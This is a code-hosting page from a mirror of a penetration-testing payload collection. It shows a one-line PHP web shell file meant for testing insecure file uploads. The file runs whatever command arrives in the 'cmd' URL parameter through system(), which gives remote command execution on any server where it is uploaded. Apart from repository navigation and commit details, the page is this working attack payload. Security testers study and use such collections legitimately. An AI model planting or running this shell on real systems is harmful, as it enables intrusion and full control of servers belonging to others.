This website requires JavaScript.
Explore
Help
Sign In
ch0ic3
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2024-12-19 02:46:10 +00:00
Code
Issues
Actions
Packages
Projects
Releases
Wiki
Activity
7877647db1
PayloadsAllTheThings
/
Upload insecure files
/
PHP Extension
/
shell.php
Swissky
4db45a263a
MSSQL union based + Windows Runas
2019-01-20 16:41:46 +01:00
1 line
43 B
PHP
Raw
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink